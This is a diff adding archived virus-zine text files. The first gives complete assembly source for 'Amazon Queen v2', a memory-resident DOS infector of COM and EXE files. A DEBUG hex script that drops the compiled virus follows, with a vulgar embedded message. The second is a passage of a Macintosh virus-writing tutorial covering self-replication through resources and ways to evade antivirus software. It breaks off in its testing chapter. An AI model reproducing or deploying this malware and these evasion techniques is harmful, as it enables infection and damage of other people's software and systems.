+ LZ> - I crack games, and programs. I'm an elite trader (Under
+       an other handle.)
+===============================================================================
+
+% Amazon Queen v2 by Lord Zer0 %
+��������������������������������
+Amazone Queen v2 is a memory resident infector of COM and EXE programs
+executed, opened (both normal and extended), or touched with the
+dos attrib-function, thus making this a pretty fast infector.
+
+It 're-vectors' interrupt 21h (dos) to be interrupt38h, marks exe-files
+with a '0' in the exe-header's negative checksum adress (12h - which
+ofcourse is ignored) and a few other thing... and yeah, it can bug, and
+there you go..
+
+- The Unforgiven.
+
+================================================================================
+	.model tiny
+	.code
+	org	100h
+
+start:
+	push	cs
+	pop	ds
+	call	begin
+begin:
+	mov	bx,sp
+	mov	bp,ss:[bx]
+	sub	bp,offset begin-100h
+	inc	sp
+	inc	sp
+	push	es
+	inc	[generation-100h+bp]
+
+	mov	ah,0ACh
+	int	21h
+	cmp	al,'0'
+	jnz	go_tsr
+
+	cmp	bx,cs:[_version+bp-100h]
+	jge	return_file
+
+	mov	ah,0AEh		; uninstall Virus
+	int	21h
+
+	mov	ah,9		; Give the user a notice that s/he has got
+				; at least two viruses on the HD...
+
+	lea	dx,[bp+vx_name-100h]
+	int	21h
+go_tsr:
+	xor	ax,ax
+	mov	es,ax
+	mov	di,200h
+	mov	si,bp
+	mov	cx,vx_size/2
+	rep	movsw
+	stosw
+	stosw
+	mov	ds,cx
+	mov	ax,offset int_21+100h
+	cli
+	xchg	ds:[21h*4],ax
+	mov	ds:[38h*4],ax
+	mov	ds:[oldint21+100h],ax
+
+	xchg	ds:[21h*4+2],cx
+	mov	ds:[38h*4+2],cx
+	mov	ds:[oldint21+102h],cx
+	sti
+return_file:
+	pop	es
+	push	cs
+	pop	ds
+	cmp	sp,0FFFEh
+	je	ret_com
+	push	es
+	pop	ds
+	mov	ax,es
+	add	ax,10h
+	add	ax,word ptr cs:[bp+buffer+2-100h]
+	push	ax
+	push	word ptr cs:[bp+buffer-100h]
+	retf
+buffer:
+	int	20h
+	db	'00'
+ret_com:
+	mov	di,100h
+	dec	sp
+	dec	sp
+	mov	bx,sp
+	mov	[bx],di
+	lea	si,[bp+buffer-100h]
+	movsw
+	movsw
+	xor	ax,ax
+	retn
+vx_name	db	' Amazon Queen...v2.0$'
+uninstall:
+	push	ds
+	lds	dx,dword ptr cs:[oldint21+100h]
+	mov	ax,2521h
+	int	21h
+	pop	ds
+installed:
+	mov	al,'0'		
+	mov	bx,cs:[_version+100h]
+	popf
+	iret
+int_21:
+	pushf
+	cmp	ah,0ach
+	je	installed
+	cmp	ah,0aeh
+	je	uninstall
+
+	cmp	ah,4bh
+	je	infect
+	cmp	ah,3dh
+	je	infect
+	cmp	ah,43h
+	je	infect
+	cmp	ah,6ch
+	je	infect
+return_dos:
+	popf
+	db	0eah
+oldint21	dw	?,?
+infect:
+	call	push_all
+	cmp	ah,6ch
+	jne	not_extended
+	mov	dx,si
+not_extended:
+	push	ds
+	pop	es
+	mov	di,dx
+	mov	al,'.'
+	mov	cx,64
+	repnz	scasb
+	mov	ax,[di]
+	or	ax,2020h
+	cmp	ax,'oc'
+	je	comexe_file
+	cmp	ax,'xe'
+	je	comexe_file
+	jmp	pop_ret
+comexe_file:
+	mov	di,offset buffer+100h
+	mov	ax,3D02h
+	int	38h
+	jnc	go_on
+	jmp	pop_ret
+go_on:
+	xchg	ax,bx
+	push	cs
+	push	cs
+	pop	es
+	pop	ds
+
+	mov	ah,3fh
+	mov	cx,18h
+	mov	dx,offset exe_hdr+100h
+	mov	si,dx
+	int	38h
+	jnc	not_close
+	jmp	close
+	db	'WHY?'
+not_close:
+	call	eof
+
+	cmp	word ptr [si],'ZM'
+	je	exe_file
+
+	cmp	byte ptr [si],41h
+	jne	no_close
+close_it:
+	jmp	close
+
+no_close:
+	movsw
+	movsw
+	mov	cx,4
+	sub	ax,cx
+	mov	[si],0e941h
+	mov	[si+2],ax
+	jmp	write
+exe_file:
+	push	si
+	add	si,14h
+	movsw
+	movsw
+	pop	si
+	cmp	byte ptr [si+12h],'0'
+	je	close
+
+	push	ax
+	push	dx
+
+	add	ax,vx_size
+	adc	dx,0
+	mov	cx,200h
+	div	cx
+	or	dx,dx
+	jz	same_page
+	inc	ax
+same_page:
+	mov	[si+2],dx
+	mov	[si+4],ax
+	mov	ax,[si+8]
+	mov	cl,4
+	shl	ax,cl
+	xchg	ax,cx
+	pop	dx
+	pop	ax
+	sub	ax,cx
+	sbb	dx,0
+
+	mov	cx,10h
+	div	cx
+
+	mov	byte ptr [si+12h],'0'
+	mov	[si+14h],dx
+	mov	[si+16h],ax
+	mov	cx,18h
+write:
+	push	cx
+	mov	ah,40h
+	mov	dx,200h
+	mov	cx,vx_size
+	int	38h
+
+	call	tof
+	pop	cx
+	mov	ah,40h
+	mov	dx,si
+	int	38h
+
+	mov	ax,5700h
+	int	38h
+	inc	ax
+	int	38h
+close:
+	mov	ah,3eh
+	int	38h
+pop_ret:
+	call	pop_all
+	jmp	return_dos
+	db	'LoRD Zer0'
+tof:
+	xor	al,al
+	jmp	movfptr
+eof:
+	mov	al,2
+movfptr:
+	mov	ah,42h
+	cwd
+	xor	cx,cx
+	int	38h
+	retn
+pop_all:
+	pop	word ptr cs:[where]
+	pop	di
+	pop	si
+	pop	ds
+	pop	es
+	pop	dx
+	pop	cx
+	pop	bx
+	pop	ax
+	jmp	jump_back
+push_all:
+	pop	word ptr cs:[where]
+	push	ax
+	push	bx
+	push	cx
+	push	dx
+	push	es
+	push	ds
+	push	si
+	push	di
+jump_back:
+	jmp	word ptr cs:[where]
+
+_version	dw	200h
+generation	dw	1
+the_end:
+vx_size	=	$-offset start
+where	=	$+100h
+exe_hdr	=	$+102h
+	end	start
+================================================================================
+
+% An alternative script! %
+��������������������������
+What follow is not exactly the virus (AQ.500), but a dropper which
+will create a file called zero.com. It does atleast contain one
+hidden area, like oh-so-many of the hex-scripts in this zine
+does.
+
+- The Unforgiven.
+
+N lord0.com
+E  100  EB 3B 0D 0A 50 72 6F 67 72 61 6D 20 6D 61 64 65
+E  110  20 66 6F 72 20 49 52 37 2E 20 50 75 62 6C 69 73
+E  120  68 65 64 20 62 79 20 49 6D 6D 6F 72 74 61 6C 20
+E  130  52 69 6F 74 2C 20 31 39 39 35 21 0D 0A FA 33 ED
+E  140  B0 13 CD 10 BA DA 03 EC A8 08 74 FB B8 00 A0 8E
+E  150  C0 8E D8 B8 C0 EE B1 09 51 8B F0 8B F8 83 C6 02
+E  160  B1 9F F3 A5 05 40 01 59 E2 EE 33 F6 B8 00 F0 8E
+E  170  C0 BB 6E FA 03 DD 26 8A 00 2E 22 06 FD 02 74 19
+E  180  BB FC EF 33 FF 81 C3 40 01 47 3B F7 7D F7 8B CE
+E  190  80 C1 18 8A E9 89 0F 32 ED 46 83 FE 08 75 D2 0E
+E  1a0  1F D0 0E FD 02 80 3E FD 02 80 90 75 1C FF 06 FE
+E  1b0  02 8B 36 FE 02 8A 84 00 03 0A C0 75 06 31 36 FE
+E  1c0  02 EB EA B3 08 F6 E3 8B E8 E4 60 3C 80 72 03 E9
+E  1d0  75 FF FB B8 03 00 CD 10 B8 00 B8 8E C0 BF 00 00
+E  1e0  B9 96 03 FC BE 4F 03 E8 03 00 EB 6C 90 56 57 50
+E  1f0  53 51 52 E3 5C 8B D7 33 C0 FC AC 3C 20 72 05 AB
+E  200  E2 F8 EB 4D 3C 10 73 07 80 E4 F0 0A E0 EB F1 3C
+E  210  18 74 13 73 19 2C 10 02 C0 02 C0 02 C0 02 C0 80
+E  220  E4 8F 0A E0 EB DA 81 C2 A0 00 8B FA EB D2 3C 1B
+E  230  72 08 75 CC 80 F4 80 E9 A2 00 3C 19 8B D9 AC 8A
+E  240  C8 B0 20 74 02 AC 4B 32 ED 41 F3 AB 8B CB 49 E0
+E  250  A9 5A 59 5B 58 5F 5E C3 B4 3C BA 2B 09 33 C9 CD
+E  260  21 B8 02 3D BA 2B 09 CD 21 8B D8 B4 40 B9 F4 01
+E  270  BA 37 07 CD 21 B4 3E CD 21 B4 07 CD 21 3C 52 75
+E  280  70 B8 03 00 CD 10 B4 09 BA 8F 02 CD 21 EB 2F 63
+E  290  6C 65 61 72 69 6E 67 20 73 63 72 65 65 6E 20 6F
+E  2a0  6E 20 79 6F 75 72 20 6B 65 79 70 72 65 73 73 2E
+E  2b0  2E 2E 2E 20 20 77 68 6F 61 68 21 0D 0A 24 B4 07
+E  2c0  CD 21 3C 49 75 2B B4 07 CD 21 3C 4F 75 23 B4 07
+E  2d0  CD 21 3C 54 75 1B B9 04 00 BE F8 02 FE 04 46 E2
+E  2e0  FB B4 09 BA F8 02 CD 21 BA 61 00 B8 03 00 EF CD
+E  2f0  20 B8 03 00 CD 10 CD 20 53 54 68 51 24 80 00 00
+E  300  20 41 4D 41 5A 4F 4E 20 51 55 45 45 4E 20 56 32
+E  310  2E 30 20 28 43 29 20 4C 4F 52 44 20 5A 45 52 30
+E  320  2E 2E 2E 2E 2E 2E 20 20 48 45 52 4D 41 4E 4E 49
+E  330  20 42 4C 4F 57 53 20 47 4F 41 54 2D 44 49 43 4B
+E  340  21 21 21 20 20 20 20 20 20 20 20 20 20 20 00 0F
+E  350  10 18 20 07 1A 09 DC 0F DC 19 02 07 1A 06 DC 0F
+E  360  DC 19 05 07 1A 09 DC 0F DC 19 02 07 1A 09 DC 0F
+E  370  DC 20 20 07 1A 08 DC 0F DC 19 02 07 1A 08 DC 0F
+E  380  DC 18 07 DB 19 08 DE 0F 17 DE 10 DD 20 07 DB 19
+E  390  06 DF 0F 17 DF 10 DC 19 02 07 DC DF 19 07 DE 0F
+E  3a0  17 DE 10 DD 20 07 DC DF 19 07 DE 0F 17 DE 10 DD
+E  3b0  07 DB 19 08 DB 0F DB 20 07 DB 19 08 DB 0F DB 18
+E  3c0  07 DB 20 20 DB 0F 17 DC 07 10 1A 04 DF DC 0F 17
+E  3d0  DC 10 DF 20 07 DB 20 20 DB 0F 17 DC 07 10 DF DB
+E  3e0  DF 20 20 DB 0F DB 20 20 07 DB 20 20 DB 0F 17 DC
+E  3f0  07 10 1A 04 DF DC 0F 17 DC 10 DF 20 07 DB 20 20
+E  400  DB 0F 17 DC 07 10 1A 04 DF DC 0F 17 DC 10 DF 20
+E  410  07 DF DF DF DB 20 20 DB 0F 17 DC 07 10 DF 0F DF
+E  420  20 07 DB 19 02 DC 0F 17 DC 07 10 1A 04 DF 0F DF
+E  430  18 07 DB 20 20 DB 0F DB 19 08 07 DB 20 20 DB 0F
+E  440  17 DF 07 10 DF 20 DF DC 0F 17 DC 10 DF 19 02 07
+E  450  DB 20 20 1A 03 DF DB 0F DB 19 04 07 DB 20 20 1A
+E  460  03 DF DB 0F DB 19 07 07 DB 20 20 DB 0F DB 19 03
+E  470  07 DB 19 02 DB 0F DB 18 07 DB 20 20 DB 0F DB 20
+E  480  00 DC 07 DC DF DF DF 0F 17 DF 10 DC 20 07 DB 01
+E  490  DB DB 17 DC 10 DB 17 DF 0F DC 01 DF DB DC 0F DF
+E  4a0  10 DC 20 20 07 DB 01 DB DB 07 DB 0F 17 DC 07 10
+E  4b0  DF DF DF 0F 17 DF 07 10 DC 01 17 DC 0F DF 10 DC
+E  4c0  20 07 DB 01 DB DB 07 DB 0F 17 DC 07 10 DF DF DF
+E  4d0  0F 17 DF 07 10 DC 01 17 DC 0F DF 10 DC 19 03 07
+E  4e0  DB 01 DB DB 07 DB 0F DB 19 04 07 DB 01 DB DB DB
+E  4f0  07 DF DF DF 0F 17 DF 07 10 DC 0F DC 18 07 DB 01
+E  500  DB DB 07 DB 0F DB 20 20 07 DF DC 01 DB DB 07 DB
+E  510  0F DB 20 07 DB 01 B1 B1 08 DC 0F 17 DC 10 20 20
+E  520  07 DE 01 17 DE 10 B1 17 DD 0F DE 10 DD 20 07 DB
+E  530  01 B1 B1 07 1A 04 DF 01 B1 B1 B0 07 DE 0F 17 DE
+E  540  10 DD 07 DB 01 B1 B1 07 1A 04 DF 01 B1 B1 B1 07
+E  550  DE 0F 17 DE 10 DD 19 02 07 DB 01 B1 B1 07 DB 0F
+E  560  DB 19 05 07 DF DF DC 01 1A 04 B1 07 DB 0F DB 18
+E  570  07 DB 01 B1 B1 B1 0F 17 DF 07 10 DC DC DC DF 01
+E  580  B1 B1 07 DB 0F DB 20 07 DB 20 08 DC 0F 17 DF 10
+E  590  19 02 07 DB 01 B1 B1 07 DB 0F 17 DB 10 19 02 07
+E  5a0  DB 1A 07 DC DB 0F 17 DB 10 19 02 07 DB 1A 07 DC
+E  5b0  DB 0F 17 DB 10 19 04 07 DB 01 B0 B0 07 DB 0F DB
+E  5c0  19 03 07 1A 03 DC DF 01 1A 03 B0 07 DC 0F 17 DC
+E  5d0  10 DF 18 07 DB 01 1A 09 B0 07 DB 0F DB 20 20 07
+E  5e0  DF 19 04 DF DC 01 B0 B0 07 DF 0F 17 DF DC 10 DF
+E  5f0  19 1D 07 DF DC DC 0F 17 DC 10 DF 20 20 07 DC DB
+E  600  1A 06 DC 0F 17 DC 10 DF 18 07 DF 1A 08 DC 0F 17
+E  610  DC 10 DF 19 0A 07 DF DF DF 0F DF 18 18 18 18 19
+E  620  0A 09 D2 19 03 D6 C4 C4 BF 20 D2 C4 C4 BF 20 D2
+E  630  C4 C4 BF 19 04 D6 C4 BF 20 20 D2 C4 C4 BF 20 D2
+E  640  C4 C4 BF 20 D6 C4 C4 BF 20 D2 18 19 0A BA 19 03
+E  650  BA 20 20 B3 20 C7 C4 C2 D9 20 BA 20 20 B3 19 04
+E  660  D6 C4 D9 20 20 C7 C4 19 02 C7 C4 C2 D9 20 BA 20
+E  670  20 B3 20 BA 18 19 0A D0 C4 C4 D9 20 D3 C4 C4 D9
+E  680  20 D0 20 C1 20 20 D0 C4 C4 D9 19 04 D3 C4 C4 D9
+E  690  20 D0 C4 C4 D9 20 D0 20 C1 20 20 D3 C4 C4 D9 20
+E  6a0  6F 18 18 18 19 17 0B C4 54 48 45 20 55 4E 46 4F
+E  6b0  52 47 49 56 45 4E 2D 18 18 19 0C 28 41 4E 53 49
+E  6c0  20 42 59 20 50 4F 52 4E 4F 20 2D 20 41 47 45 53
+E  6d0  20 41 47 4F 2E 2E 2E 20 21 20 21 20 21 20 21 29
+E  6e0  18 18 18 18 18 54 55 3E 20 48 69 20 45 6D 6D 61
+E  6f0  2C 20 73 63 68 75 74 74 75 70 20 61 6E 64 20 73
+E  700  6C 65 65 70 20 77 69 74 68 20 6D 65 21 0D 0A 62
+E  710  63 6F 73 20 79 6F 75 20 61 72 65 20 79 6F 75 6E
+E  720  67 20 61 6E 64 20 68 61 76 65 20 61 20 70 75 73
+E  730  73 79 21 21 21 0D 0A 0E 1F E8 00 00 8B DC 36 8B
+E  740  2F 81 ED 05 00 44 44 06 FF 86 F2 01 B4 AC CD 21
+E  750  3C 30 75 13 2E 3B 9E F0 01 7D 39 B4 AE CD 21 B4
+E  760  09 8D 96 8E 00 CD 21 33 C0 8E C0 BF 00 02 8B F5
+E  770  B9 FA 00 F3 A5 AB AB 8E D9 B8 B8 02 FA 87 06 84
+E  780  00 A3 E0 00 A3 D9 02 87 0E 86 00 89 0E E2 00 89
+E  790  0E DB 02 FB 07 0E 1F 83 FC FE 74 17 06 1F 8C C0
+E  7a0  05 10 00 2E 03 86 7A 00 50 2E FF B6 78 00 CB CD
+E  7b0  20 30 30 BF 00 01 4C 4C 8B DC 89 3F 8D B6 78 00
+E  7c0  A5 A5 33 C0 C3 20 41 6D 61 7A 6F 6E 20 51 75 65
+E  7d0  65 6E 2E 2E 2E 76 32 2E 30 24 1E 2E C5 16 D9 02
+E  7e0  B8 21 25 CD 21 1F B0 30 2E 8B 1E F0 03 9D CF 9C
+E  7f0  80 FC AC 74 F1 80 FC AE 74 E0 80 FC 4B 74 15 80
+E  800  FC 3D 74 10 80 FC 43 74 0B 80 FC 6C 74 06 9D EA
+E  810  00 00 00 00 E8 FE 00 80 FC 6C 75 02 8B D6 1E 07
+E  820  8B FA B0 2E B9 40 00 F2 AE 8B 05 0D 20 20 3D 63
+E  830  6F 74 08 3D 65 78 74 03 E9 AE 00 BF 78 02 B8 02
+E  840  3D CD 38 73 03 E9 A1 00 93 0E 0E 07 1F B4 3F B9
+E  850  18 00 BA F6 04 8B F2 CD 38 73 07 E9 87 00 57 48
+E  860  59 3F E8 97 00 81 3C 4D 5A 74 17 80 3C 41 75 02
+E  870  EB 73 A5 A5 B9 04 00 2B C1 C7 04 41 E9 89 44 02
+E  880  EB 46 56 83 C6 14 A5 A5 5E 80 7C 12 30 74 56 50
+E  890  52 05 F4 01 83 D2 00 B9 00 02 F7 F1 0B D2 74 01
+E  8a0  40 89 54 02 89 44 04 8B 44 08 B1 04 D3 E0 91 5A
+E  8b0  58 2B C1 83 DA 00 B9 10 00 F7 F1 C6 44 12 30 89
+E  8c0  54 14 89 44 16 B9 18 00 51 B4 40 BA 00 02 B9 F4
+E  8d0  01 CD 38 E8 22 00 59 B4 40 8B D6 CD 38 B8 00 57
+E  8e0  CD 38 40 CD 38 B4 3E CD 38 E8 1A 00 E9 1F FF 4C
+E  8f0  6F 52 44 20 5A 65 72 30 32 C0 EB 02 B0 02 B4 42
+E  900  99 33 C9 CD 38 C3 2E 8F 06 F4 03 5F 5E 1F 07 5A
+E  910  59 5B 58 EB 0D 2E 8F 06 F4 03 50 53 51 52 06 1E
+E  920  56 57 2E FF 26 F4 03 00 02 01 00 7A 65 72 6F 2E
+E  930  63 6F 6D 00
+RCX
+834
+W
+Q
diff --git a/textfiles.com/virus/macv.txt b/textfiles.com/virus/macv.txt
new file mode 100644
index 00000000..207faacb
--- /dev/null
+++ b/textfiles.com/virus/macv.txt
@@ -0,0 +1,121 @@
+How To Write A Virus For The Macintosh
+	*or 'How I Learned To Stop Worrying And Love The Resource Manager'
+document version 1.0
+
+
+Due to numerous requests for this type of information, I will delve myself into the dark side and release that information by which people can be arrested. Please note that this file contains no source code and no information about destructive code, but simply gives the basic ideas and principles behind writing a reproducing code resource and how it can be used to better society.
+
+
+Chapter 1: Basic Principles
+
+A computer virus, by definition, is a piece of processor-executable code that can reproduce itself within it's environment. In the Macintosh system, an object called a resource can contain executable code. Most common executable resources are of type 'CODE', along with others such as 'DRVR', 'CDEF', 'WDEF', 'INIT', and so on. These resources are loaded into memory and 'jmp'ed to to be executed (an assembly language term for jump). Note that not only these types listed above can contain code. The trick is to get the virus code loaded and called by 'accident'.
+There are many places where code resources are loaded and executed. For one example, at the launch of an application, the CODE resource with ID=0 is loaded (the jump table), and then jumps to the first listing in it's table. As another example, a 'CDEF' resource is called to draw certain controls (ID=0 for buttons, checkboxes, and radio buttons; ID=16 for scroll bars, etc.). Another example: an 'INIT' resource is called at startup time if the file which contains it is in one of the special system folders. There are numerous other places within applications, and even within system software itself, where code is loaded and called. Each virus uses a trick with one of these methods to get itself called. Some of these methods are described in more detail below.
+Once the virus code is executed, it's main responsibility is to duplicate itself. This in itself is a fairly easy process. Since your executable code resource is already loaded into memory, you can use a few popular toolbox calls to place it into any other file or application that would suit your needs (where it would also have the chance of being executed). After the duplication is complete, the virus may do any other task it deems necessary.
+One of the reasons why viruses crash is that their reproduction or startup code is not compatible with other systems and/or machines, not that their damage system actually did any damage. If you write code following the Inside Macintosh rules and code defensively, you should be able to write a clean piece of code that travels without problems. Always code defensively: it's your work out there� you want to be proud of it. Read below to find some tips on doing just that.
+Virus testing is a very difficult process, in that your own system is constantly infected, possibly numerous times with older versions of the virus. There are methods to the madness, so again, read on.
+A few of the catches to writing a virus is being aware of the methods used by virus-protection software. If simply written, a virus could be caught very quickly and not have much effect beyond your own system. If the methods are thought out and the patches made by the protection software are understood, then a virus could at least require software companies to update their existing detection methods. Every virus to date has been able to be detected and destroyed, so don't feel bad.
+Is everybody happy? Then let's go!
+
+
+Chapter 2: Writing Executable Code
+
+An executable code resource is easy to create with a good software-development application such as THINK C (or C++) or THINK Pascal or MPW. There are slight differences between the environments, but nothing major. I will be giving examples for code written in THINK C, for that is the system I use.
+
+An executable code resource usually starts with a
+	void main(void)
+and within such, your executable code exists. Note, as always, that executable code cannot handle global variables (variables defined above the definition of the main code, accessible by the whole file/project). THINK C handles ways around this, and MPW uses the methods in Tech Note #256, but in most cases, you won't really need global variables, unless the code is complex enough to require separate procedures and/or object-oriented code. In any case, you can usually define your variables inside the main procedure itself. There aren't too many rules as far as writing code resources, so long as you know under which circumstances your code will be called. If you are patching a Toolbox trap, for example, you must take the same form as the patch you are trapping:
+	void ModalDialogPatch(ProcPtr procFilter,int *itemHit)
+If you are patching an operating system trap, you need to do some register playing, but you need to take an empty procedure form:
+	void OpenPatch(void)
+even though the FSOpen, PBOpen, etc. take paramBlocks. Note: they are stored in registers A0, D0, and A1 usually. Check the trap for specifics. You need to save these before you execute your code, and then restore them upon return.
+If you are executing code that is to be run as a VBL or Time Manager task, always remember that you cannot use code that even thinks about using the Memory Manager (i.e. moves or purges memory). Make sure all the toolbox calls you use are not in the 'dreaded list' in the appendix of each volume of Inside Macintosh.
+
+The type of the code resource is very dependent upon which method you wish to use to get your code executed. Read the next section for details on such execution theories.
+
+After you're done writing the code, check it over for simple things you might have forgotten (original Quickdraw compatibility, system versions, etc.), and compile the sucker. For right now, you can throw the code resource into some sort of test file (or stagnant file, where the code will not be executed and/or reproduce). Note that you should NOT have any external resource files to compile along with it. Code resources such as this should preferably be self-contained, and not have to 'carry around the extra luggage', so to speak. There are methods to carry along bitmaps (as 'unknown data') and use them as graphics. But you should never rely on things like GetNewDialog, because that requires the existence of a DITL resource. Instead, use calls like NewDialog, where the code builds the relevant information in. It might make things harder to read and a bit harder to edit, but it's what you have to do in order to make everything self-contained.
+
+Most of the compilers create some sort of header at the beginning of each executable code resource. This header could give away some vital information about the resource which would make it easy for a virus-detector to find. Double check it after compilation to make sure it's clean and doesn't look suspicious.
+
+
+Chapter 3: Getting Your Code Executed
+
+This technique you use here defines how your virus spreads. Some earlier viruses were more virulent than others; nVir needed an infected application to boot for it to execute; WDEF required only that a disk be inserted. There are lots of places for code to be "patched" so that your code can be executed. The trick is finding them and recovering from them gracefully. Not every method can be discussed in this note, but I will give some general examples and how to find your own 'hooks'.
+
+One of the most popular methods amongst virii is infecting applications, since they, by definition, have executable code built right into it. If you can get your code executed along with the many other little segments in the application, the code could recover undetected. When an application starts up, the resource CODE with ID=0 is loaded into memory, and it's popularly known as the jump table. It keeps track of all of the procedures or segments in an application. If part of an application needs to call another procedure inside the application, it checks with the jump table for it's location. If it sees that the procedure is not in memory, it will load it first, then execute it. This is all taken care of by the compiler and the system software, so it's invisible to the programmer (in most cases). The system loads the jump table and immediately executes the first entry in the list when an application begins.
+You can patch yourself into this list of procedures by modifying the jump table itself. You can modify the first entry of the jump table to be your code, but save the original entry so that you can call the actual application when you're done (destroying the first entry in any CODE 0 resource renders the application totally useless). So, instead of the system executing what it thinks is the application, it will run your code first, and then run the application.
+
+Another method by which virii get executed is by utilizing a wonderful feature of the Resource Manager. As given in Inside Macintosh volume 1, the Resource Manager will look for resources in the top-most resource file that is open (the one most recently opened in most cases, unless UseResFile has been used). These searches also include searches for basic system code resources, such as window definitions, control definitions, and even international transliteration code. If you have a resource with the same type and ID as one in the system, and this resource file is open, the system will execute your resource instead of the system's. The catch again with this is that you should call the original resource as well to make your code invisible to the naked eye. This, apparently, is how the WDEF virus worked. When a disk was inserted, the desktop file was automatically opened and put in the list of resource files. Within this time that the file was open, the WDEF file which existed within was executed (the system needed to draw the window itself using the standard WDEF resource). This method requires no patching of other code and makes it very elegant. The thing that makes them easy to detect is that you find code resources in very odd places. A WDEF resource is not usually found in the desktop file.
+
+To find other hooks for code execution, look at all the executable code inside the system. These pieces are executed at one time or another for certain calls. Things that might not seem obvious right away may make good places for patching. Lots of applications use (maybe indirectly) the International Utilities Package, for it has many good string manipulation routines. A patch there might be possible. 'ptch' resources in the system are loaded automatically at startup time to patch bits of ROM. A system could be infected there and be loaded before all other extensions. Poke around the resources and find out which ones are executable, and then find out when they are executed. You might be able to find a great patch to live off of.
+
+
+Chapter 4: Reproduction
+
+Reproduction of any code resource requires the help of the File Manager and/or the Resource Manager. The concept is not very simple, but the execution is very easy. Since the virus itself is simply one code resource (preferably not more than one), then it can be loaded, added, modified, changed, and saved just like any other resource. And the fun part of it is, you can do all this to the code you are currently executing. This is apparently dangerous (Apple warns us about self-modifying code), but we're not modifying anything about our code; simply our placement. With a few simple calls we can duplicate ourselves anywhere we wish.
+
+When an executable code resource is called, the pointer to the resource is placed in register A0. You can use this pointer to reference yourself. A simple line of assembly can place A0 in any variable you choose. Once you have this variable, you must translate it into a handle with the RecoverHandle call. Now you have a handle to your own loaded resource, but you still cannot duplicate it. As a handle to a resource, you cannot use it to be copied into other files. You 'belong' to your owning file, and are not expected to go elsewhere. Use the DetachResource call to remove your reference to the file you came from. After this call, you are simply an executable block of memory floating around with a handle on yourself (phallic, isn't it?). All you need to have to have total freedom with a block of memory is a handle to it. You've got this free handle now. Now comes the time to find the file you have to duplicate yourself to.
+The file you find depends on how your virus is designed to work. You can copy yourself into applications, into desktop files, or into the system. Again, dependent on how your executing mechanism requires it. Once you have found your file (usually with use of the File Manager), open up it's resource fork with OpenResFile or any other similar procreation of it (FSpOpenResFile, etc.). Call AddResource with the required parameters, then call WriteResource to forcefully write the resource to the file or simply close the file itself (it will automatically be saved). Your code has now copied itself into another file. Reproduction! Now just let it sit and wait for it to be called!
+
+
+Chapter 5: Defensive, Clean Coding
+
+As always, if you want your code to be run cleanly on all systems, you have to be prepared for any type of situation. Apple warns us of this all the time, so I don't have to go into too much detail, but there are a few things I would like to stress so that your code doesn't simply crash when it gets executed. You goal is then not found. Here are some tips and things to watch out for.
+
+1. ResError. Who knows? Maybe you've been purged. Check it after every Resource Manager call you can, taking efficiency into account, of course.
+2. Nil pointers. Who knows? Maybe a virus detector caught part of your set of resources (if you're using a set, which I highly discourage) and deleted them. Find an alternate route, or exit gracefully.
+3. Patch well. If you are going to modify something like a jump table, be sure you keep the originals somewhere for your own use so you can call the code (pass-through coding). If you don't, and you just destroy it and call the next code resource down the line, who knows what you might be calling. A bezier-curve calculation routine does nothing if the caller knows not what he's doing.
+4. File Manager. Don't depend on each hard drive being called "Macintosh HD". Don't depend on an "Applications" folder. Don't depend on anything. Read the directory and see what you find interesting. System 7's File Manager is great, but watch out for:
+5. System 6 or before. You wouldn't want your code to execute only on one system version now, would you? By known figures, only 50% of Mac users use System 7. Sad, eh? But why exclude them from the pleasures of your code?
+6. Error Check, Error Check, Error Check. The thought police are on you again. Never forget that nothing is permanent.
+
+
+Chapter 6A: Virus Protection Software: How It Works
+
+Virus protection software was a good idea. It worked for a while. Then it became a commercial product. Virex, SAM, etc. The best one out in the world today is freeware: Disinfectant. A beautifully-written piece by John Norstad. I personally am against commercially-written virus protection. However, I am not here to give praise to independent software authors. I am here to tell you how some of their mechanisms work.
+
+Patching toolbox traps is a popular method of modifying the system's own code. Before it calls the real thing, it calls the patch (your code). Virus detectors use this method to keep an eye out for parameters passed through certain toolbox calls to check to see if they are virus-related.
+One popular patch is AddResource. If a virus detector sees that the type of resource that is being added is of type 'nVir', then it'll catch you. If it sees 'WDEF' with ID=0 and the open resource file is the desktop, then it'll catch you. Since AddResource is a very dependent call used for replications, it's almost certain to work every time. Other less-popular but more efficient patches are those at the base level of the operating system, not even documented by Apple. Traps such as _vBasicIO, _VInstall, _NewHandle, _vMRdAddr, and even _ADBReInit get trapped by the Disinfectant extension. Because these are very basic calls (used by nearly anything that does input and output, in the case of _vBasicIO), it can catch nearly anything coming toward it. It's nearly foolproof. After knowing what type of virus it is, the software can delete the virus quickly and easily.
+
+Good applications also use their own version of virus protection. At the startup of their application, the number of resources in the file is counted, and the more important executable resources in the file are checked for their size. This way, if an application has had a resource added, it will be able to alert the user and stop execution.
+
+
+Chapter 6B: Virus Protection Software: How To Bypass It
+
+Though virus protection is great in most cases, there are still 'back doors' which haven't been explored at the time of this writing. Here are some ideas for getting around the checks that most virus protection software uses.
+
+A trap is still a trap. It is not the real code; it is a dispatcher. It stops you on the way there, but it doesn't stop you from doing what those basic calls do on your own. This does require a fair amount of assembly language and ROM copying, but it gets you around the catch of using operating system traps at all. Simply copy the code that is contained in the trap itself and use that code. To never get caught, never use traps. But we know how nearly impossible that is. However, things are gained and lost in good code writing.
+
+A drawback of virus protection in general is that the software has to be continually updated for each new virus and identified by name in most cases. One ingenious idea (mine? I don't know) is to make the name and/or type of the virus variable. It doesn't always have to be called 'nVir' or 'WDEF' (unless the mechanism depends on the name or type). Make the type change from permutation to permutation. This makes it much more difficult to catch.
+
+One feature of the File Manager is it's automatic updating of the modification dates. Every time a file is updated or modified in any way, the modification date is changed. You can find and modify the date with a fairly simple low-level File Manager call. This is really a frivolous precaution, but it makes it easy to find the source of a virus attack. Changing the dates to something fairly feasible (NOT Jan. 1, 1904) may bypass such checks.
+
+The application checks can be overridden with good code-writing as well. If the virus is to add a resource to a file (as it usually has to), why not delete one in it's place? You've got to be sure that the type is the same as another type (this is where the variable types come in handy), and you may even want to vary the size of it to make it match the one it replaced (hopefully a larger size). Simply modifying a resource (like CODE 0) with the same amount of bytes will usually not be detectable. This way, the applications still counts and finds nothing unusual. However, in the process, the application is permanently damaged in some way.
+
+
+Chapter 7: Testing
+
+In testing a virus on your own system, you subject it to many continuous attacks - maybe even ones that are unintended. There are some rules to follow to be sure that you can keep track of it's location and make sure it doesn't destroy your work in the process.
+
+1. SysBeep debugging. I'm sure most of us a pretty familiar with this technique. It's compatible on all systems, and it's an aural identification. No visuals to set up, no extra resources. Simple SysBeep(0); is sometimes enough to know that everything's all right. When testing your duplication code to find out when it actually happens, use SysBeep after each one and then check to see where it went.
